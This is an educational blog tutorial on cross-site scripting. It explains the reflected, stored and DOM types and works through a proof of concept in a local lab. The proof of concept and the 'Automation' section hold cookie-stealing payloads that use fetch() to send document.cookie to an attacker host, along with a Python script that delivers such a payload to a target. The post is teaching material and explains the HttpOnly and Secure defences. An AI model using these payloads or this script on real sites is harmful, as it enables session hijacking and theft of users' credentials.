---
title: "XSS ( Cross-Site Scripting )"
date: 2021-08-16T15:44:33+02:00
draft: false
image: "/static/WEB/xss-index.png"
categories:
    - MostCommonWeb
tags:
    - XSS
    - WEB
---

[1] Cross-Site Scripting (XSS)

```
Today I'll be explaining in a simple way what is an XSS attack, and about how to 
execute it correctly as well as its different applications.
```

# [*] INDEX: 

- [1. WHAT IS XSS ?](#1--what-is-xss-)
- [2. HOW DOES XSS WORK ?](#2--how-does-xss-work-)
    - 2.1 HTML
    - 2.2 CSS
    - 2.3 JavaScript
- [3. TYPES OF XSS](#3--types-of-xss)
    - [3.1 REFLECTED XSS](#-1--reflected-xss)
    - [3.2 STORED XSS](#-2--stored-xss)
    - [3.3 DOM XSS](#-3--dom-xss)
- [4. LAB PRACTICE](#4--lab-practice)
- [5. POC (Proof Of Concept)](#5--poc--proof-of-concept-)
    - [5.1 How to prevent Cookie Hijacking?](#-how-to-prevent-cookie-hijacking-)
- [6. AUTOMATION](#6--automation)
- [7. CHEAT SHEET](#-7--cheat-sheets)
- [8. TL;DR](#tldr-)

# 1- WHAT IS XSS ?

Cross-Site Scripting, also known as XSS, it's one of the most common web security vulnerability according to OWASP TOP10. XSS is not a direct attack towards the server, actually it's an attack against client web browsers, so we can conclude that XSS is a client-side code injection attack. The attacker includes malicious code in the legitimate website, but no scripts have been run so far. Once the web application is visited by the victim's browser (another user) the data included by the attacker is interpreted as part of the code of the original website, so now the code will be executed. So in a not too technical way, the attacker stores the malicious code in the website (this works as a intermediary) and when the victim gets to the site, his browser executes the code. This could be used to steal sensitive information as login credentials, authentication tokens as cookies or personal user data ... as well as perform actions on behalf of authenticated users.

# 2- HOW DOES XSS WORK ?

When an input panel is not well-parsed, and we can inject code means that the site is vulnerable to XSS as we have said before. We know that the frontend (client side) of a web page is made up of 3 main languages :

1. HTML

Hyper Text Markup Language, is where the "text" of the whole website is located, with a simple metaphor with a house, HTML could be the bricks that conforms the whole house. Is used to structure a web document defining things like headlines and paragraphs, being able the possibility of embedding images, videos ...

```html
<!DOCTYPE html>
<html>
<body>

<h1>Hello I'm HTML</h1>
<p>This is my frst paragraph!!</p>

</body>
</html>
```

2. CSS

Cascading Style Sheets, it's in charge of giving style to the HTML, it comes through and specifies HTML style as the page layouts, colors, fonts ... Following with the last metaphor with a house, CSS could be the painting of the house or the furniture to make it prettier.

```css
<h1 style="color:blue;">A Blue Heading</h1>

<p style="color:red;">A red paragraph.</p>
```

3. JS

JavaScript, this is used both on client-side and server-side, allows you to make web applications interactives. Following again with the metaphor, while HTML and CSS is only appereance, JS can be executable, JS could be the door, windows, letting the user interact.

```jsx
<!DOCTYPE html>
<html>
<body>

<h2>What Can JavaScript Do?</h2>
<p id="demo">JavaScript can change HTML content.</p>
<button type="button" onclick='document.getElementById("demo").innerHTML = "Hello JavaScript!"'>Click Me!</button>

</body>
</html>
```

So now that we understand how does the client-side of a website work, we can go back to XSS. This is code written in JS, but as seen before, the text data was stored in HTML, so how does this work? When we input a JS code as text, it will be saved to HTML as text, but the browser will read that part of the code as JS ( this is due to the fact that JS and HTML can be written in the same document ). An XSS payload could be this :

```jsx
<script>alert("Vulnerable")</script>
```

![<- Not working](/static/WEB/XSS-1.png)

In the case that the site is vulnerable to XSS this will be shown to us. In my example case I'll be using this lab on my local machine : [https://github.com/Learn-by-doing/xss](https://github.com/Learn-by-doing/xss). Althought alert is the most common way to test if the server is vulnerable due to it's ease of calling due to it's harmless and hard to miss when it's called correctly. But why is alert "dead"? According to [this post](https://portswigger.net/research/alert-is-dead-long-live-print) from PortSwigger.

# 3- TYPES OF XSS

### *[ 1 ] REFLECTED XSS*

This first type of XSS attack is also known as non-persistent XSS, this is the one we used for the first example :
![<- Not working](/static/WEB/XSS-2.png)
This connection is between the Server and ourself, not affecting other users, allowing us to inject JavaScript.

### *[ 2 ] STORED XSS*

Also known as Persistent XSS, this is from my standpoint the most interesting one, this isn't just reflected back but instead the input is persisted or basically stored in some sort of a database or something and then shown back to the user by pulling it out from the place that it was stored. So in conclusion this is executed by everyone who just views the page that depended of your input.
![<- Not working](/static/WEB/XSS-3.png)
The most common place to exploit this vulnerability is through comment section, used to store sensitive data as cookies 🍪.

### *[ 3 ] DOM XSS*

Also known as **Type-0 XSS** , where the attack is executed as result of the modification of the "environment" DOM in the browser of the victim, using the script of the original client side, so the code is executed unexpectedly. This is completly different to Stored and Reflected XSS, this payload is not placed on the main response page ( due to a server error ). In this case the payload will not get to the server so the attacker won't have to bypass filters.
![<- Not working](/static/WEB/XSS-4.png)
# 4- LAB PRACTICE

As I have said, I'll be using user [chill117](https://github.com/Learn-by-doing/xss)'s lab :

- [https://github.com/Learn-by-doing/xss](https://github.com/Learn-by-doing/xss)

To make it work we just have to run the following commands (we'll need node) :

```bash
git clone https://github.com/Learn-by-doing/xss.git
cd xss
npm install
node server.js
```
![<- Not working](/static/WEB/XSS-5.png)

Now if we check our [http://localhost:3000/](http://localhost:3000/) we'll see this :
![<- Not working](/static/WEB/XSS-6.png)

## OTHER LABS 🧪 :

- [https://portswigger.net/web-security/all-labs](https://portswigger.net/web-security/all-labs)
- [https://pentesterlab.com/exercises/xss_and_mysql_file/course](https://pentesterlab.com/exercises/xss_and_mysql_file/course)
- [https://xss-game.appspot.com/](https://xss-game.appspot.com/)
- [https://alf.nu/alert1](https://alf.nu/alert1)
- [https://hack.me/t/XSS](https://hack.me/t/XSS)
- [http://vulnweb.com/](http://vulnweb.com/)
- [http://sudo.co.il/xss/](http://sudo.co.il/xss/)
- [https://xss-quiz.int21h.jp/](https://xss-quiz.int21h.jp/)
- [http://prompt.ml/0](http://prompt.ml/0)

# 5- POC ( Proof Of Concept )

- LAB : [https://github.com/Learn-by-doing/xss](https://github.com/Learn-by-doing/xss)

If we use any cookie manager we'll see that we have some cookies, to make it easier I'll create 2 cookies, one vulnerable and other which is not.

![<- Not working](/static/WEB/XSS-7.png)

### [+] SET COOKIES 🍪 :

![<- Not working](/static/WEB/XSS-8.png)
![<- Not working](/static/WEB/XSS-9.png)

In this case, the payload :

```bash
<script>alert("Vulnerable")</script>
```

is not vulnerable, but instead of that one, this actually works :

```bash
<svg/onload=print(1)><svg>
```

![<- Not working](/static/WEB/XSS-10.png)
So once verified that the site is vulnerable to XSS, let's try to steal our cookies ( this lab is not prepared for Stored XSS but the concept is the same one ) :

```bash
<svg/onload=alert(document.cookies)><svg>
```

![<- Not working](/static/WEB/XSS-11.png)
```bash

localhost:3000 dice
vulnerable_cookie=Hacked_vulnerable_cookie
```

As we can see, it worked!! The vulnerable cookie was leaked, but what's the difference between both cookies?

### [+] HOW TO PREVENT COOKIE HIJACKING ?

![<- Not working](/static/WEB/XSS-12.png)
Cookie hijacking is one of the main applications of the Cross-Site Scripting vulnerability, it consists in that though XSS tries to obtain the cookies from the victim and get their session. Obviously it's about **Stored XSS** (the malware comes from the websites database) The attacker leave the payload on the website, where it's stored. When the victim browser get's to the site, the payload is executed as the victim and then gets the cookie. A very common payload could be this one :

```bash
<script>fetch("http://XXX.XXX.XXX.XXX:8000/"+document.cookie)</script>
```

This will make the victim request the url :

```bash
http://XXX.XXX.XXX.XXX:8000/+document.cookie

means

http://XXX.XXX.XXX.XXX:8000/?here
```

Let's put it in practice, in the first place we have to open an http server to receive the data :

```bash
python3 -m http.server 8989
```

![<- Not working](/static/WEB/XSS-13.png)

Let's input this payload :

```bash
<svg/onload=fetch("http://127.0.0.1:8989/"+document.cookie)><svg>
```

![<- Not working](/static/WEB/XSS-14.png)

Once understood the concept of Session Hijacking, let's explain the difference between the vulnerable cookie and the not vulnerable one :

- ***VULNERABLE COOKIE :***
  - [ ] HttpOnly
  - [ ] Secure
- ***NOT VULNERABLE COOKIE :***
  - [x] HttpOnly
  - [ ] Secure

But what does this means? **HttpOnly** flag means that JavaScript will not be able to request the cookie in case of XSS exploitation, this means that our payload is completly useless against **HttpOnly**. Although there is other flags, for example **Secure** , when a Secure flag is used, the cookie will only be sent over HTTPS, which is HTTP over SSL.

# 6- AUTOMATION

Here I'll be leaving a very simple script to exploit a cookie hijacking, even though this lab is not prepared to test Stored XSS, the idea would be the same one. Actually this script doesn't work on the lab, due to the fact that it's not Stored XSS.

```python
#!/usr/bin/python3

import requests
import sys

s = requests.Session()

def main():

    if len(sys.argv) != 5:
        print(f"[+] Usage: {sys.argv[0]} TARGET RPORT LHOST LPORT\n\n[+] LISTEN FROM YOUR LOCAL MACHINE : python3 -m http.server LPORT")
        sys.exit(-1)

    domain = sys.argv[1]
    rport = sys.argv[2]
    lhost = sys.argv[3]
    lport = sys.argv[4]

    target = f"http://{domain}:{rport}/"
    payload = f"%3Csvg%2Fonload%3Dfetch%28%22http%3A%2F%2F{lhost}%3A{lport}%2F%22%2Bdocument.cookie%29%3E%3Csvg%3E"

    url = target + "?q=" + payload

    cookies = {"my_cookie": "Hacked!!!"}
    headers = {"Upgrade-Insecure-Requests": "1", 
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 
        "Sec-Fetch-Site": "same-origin", 
        "Sec-Fetch-Mode": "navigate", 
        "Sec-Fetch-User": "?1", 
        "Sec-Fetch-Dest": "document", 
        "Referer": "http://localhost:3000/?q=%3Csvg%2Fonload%3Dprint%281%29%3E%3Csvg%3E", 
        "Accept-Encoding": "gzip, deflate", 
        "Accept-Language": "es-ES,es;q=0.9", 
        "Connection": "close"}
    print(url)
    s.get(url, headers=headers, cookies=cookies)

if __name__ == "__main__":
    main()
```

Here I have an example on a vulnerable moodle version which we can get the cookie from an administrator who visits our profile.
![<- Not working](/static/WEB/XSS-15.png)

# [ 7 ] CHEAT SHEETS

Here I will leave you some of the cheat sheets that I use the most :

- [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
- [https://owasp.org/www-community/xss-filter-evasion-cheatsheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet)
- [https://ironhackers.es/cheatsheet/cross-site-scripting-xss-cheat-sheet/](https://ironhackers.es/cheatsheet/cross-site-scripting-xss-cheat-sheet/)
- [https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45](https://www.notion.so/9a613c9ab68914312cbb415134795b45)

# THANKS FOR READING 👏!!

# TL;DR 🐚

This is part of my little research about XSS. T

he entire post will be part of a group research about Most Common Web Vulns found in BugBounty programs. This research is powered by [@takito1812](https://twitter.com/takito1812) with other buddies from CybexSec. 🧪